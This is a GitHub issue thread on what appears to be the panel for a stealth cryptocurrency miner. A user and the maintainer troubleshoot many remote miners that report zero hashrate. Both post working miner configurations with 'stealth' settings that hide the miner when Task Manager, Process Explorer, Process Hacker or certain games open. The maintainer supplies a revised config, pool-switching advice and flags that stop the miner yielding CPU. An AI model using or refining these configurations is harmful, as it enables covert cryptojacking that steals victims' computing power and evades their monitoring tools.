### ISSUE TITLE
The distribution of miners

### ISSUE THREAD

**Issue by anbu-squad** [UnamSanctam/UnamWebPanel#158]
I thought here that the panel would distribute miners according to pre -set settings

For example, all those miners that give up to 50 h/s translate to RTM, so that weaker CPU mined a lighter coin

Well, this is generally, figuratively speaking, the indicator of the minimum hashrate was set individually by each

And what to do with the GPU, how to distribute, I do not know yet, it is possible too

Simply, some workrs are idle, and in general you can safely minute 4 coins

**Comment by UnamSanctam** [comment]
Sorry I don't really understand what you're asking.

**Comment by anbu-squad** [comment]
Sorry for my English, I use the translator

I had in mind, on the panel most miners reports 0 hashrate, perhaps some can not cope with mining for example the same Monero due to a lack of RAM or low capacity of the processor

You have to sort it out individually by each miner and change the configuration on the RTM

And now if the basker does not cope with the complex algorithm
automatically transfer to a more affordable profit for obtaining a hash

in general, I just suggested, but you know better there

**Comment by UnamSanctam** [comment]
Ah alright I understand what you mean, doing things like that is quite complicated, I've been experimenting with implementing a custom version of the benchmarking for algo-switching used by pools like MoneroOcean that can switch between what is most profitable depending on hashrates of different algorithms but it has quite a few drawbacks so I haven't finished it yet.

**Comment by anbu-squad** [comment]
1. By the way, can you add somewhere else the number of devices?

There are the number of miners, but the number of devices is not

It is difficult to understand how many devices in general

2. I noticed in the new version of the panel that some old versions of the miners are constantly reporting 0 hashrate and the change of remote configuration does not work, without the concept of what is the matter

**Comment by UnamSanctam** [comment]
1. Sure I could add that.
2. The panel should be backwards compatible with all older version, can you send a screenshot of one? Does the configuration not change anything in it?

**Comment by anbu-squad** [comment]
![SharedScreenshot1](https://user-images.githubusercontent.com/88142198/177825084-f8f02b11-c7bd-4b75-b54d-1b37f1462a78.jpg)
![SharedScreenshot2](https://user-images.githubusercontent.com/88142198/177825101-43e852ba-1728-44d5-84cc-0931758cf9fb.jpg)
![3](https://user-images.githubusercontent.com/88142198/177825111-c08a2363-8dde-403c-8e80-31d82ed79a9c.jpg)
![SharedScreenshot](https://user-images.githubusercontent.com/88142198/177825118-ee5c0e42-f8dd-46ca-bbd8-cf5b1e00402f.jpg)

**Comment by anbu-squad** [comment]
RTM:

{
	"algo": "gr",
	"pool": "eu.flockpool.com",
        "port": 5555,
        "wallet": "wallet.{COMPUTERNAME}",
        "password": "pass pool",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 30,
	"idle-wait": 5,
	"idle-cpu": 80,
	"stealth": true,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe"
}


XMR:

{
	"algo": "rx/0",
	"pool": "gulf.moneroocean.stream",
        "port": 20001,
        "wallet": "wallet.{COMPUTERNAME}",
        "password": "",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 30,
	"idle-wait": 5,
	"idle-cpu": 80,
	"stealth": false,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,WorldOfTanks.exe,wotblitz.exe"
}



Well, in general, in most cases, a remote configuration works well

**Comment by UnamSanctam** [comment]
Hmm, it is possible that those computers/miners wasn't able to connect to the flockpool pool, then it would go to the backup pool. Try using another pool, for example MoneroOcean for RTM (for those miners).
So try this configuration:
```
{
"algo": "rx/0",
"pool": "gulf.moneroocean.stream",
"port": 20001,
"wallet": "wallet",
"password": "{COMPUTERNAME}~ghostrider",
"nicehash": false,
"ssltls": true,
"max-cpu": 30,
"idle-wait": 5,
"idle-cpu": 80,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,WorldOfTanks.exe,wotblitz.exe"
}
```

(Worker names in MoneroOcean is written in the password field)

**Comment by anbu-squad** [comment]
Yes thank you
The miners really switched and began to report the hash.

However, a certain number of miners reporting 0 hashrates constantly remain, but not constantly, it happens that they begin to communicate the hash for a while, as far as I understand, this is due to the search for successful shares

**Comment by UnamSanctam** [comment]
Do you mean that they report 0 H/s on the panel or in the pool? If it's in the panel then if they are low-end CPUs (low amount of cores) then that can happen if the user needs to use the CPU, then it will go down so that it won't lag for the user.

**Comment by UnamSanctam** [comment]
Yes if the system needs resources then the miner will yield it to avoid any lag. It is possible to stop the yielding with options like `--cpu-no-yield` or `--cpu-priority=5` inside the "Advanced Parameters" though it's not really recommended to do that of course.
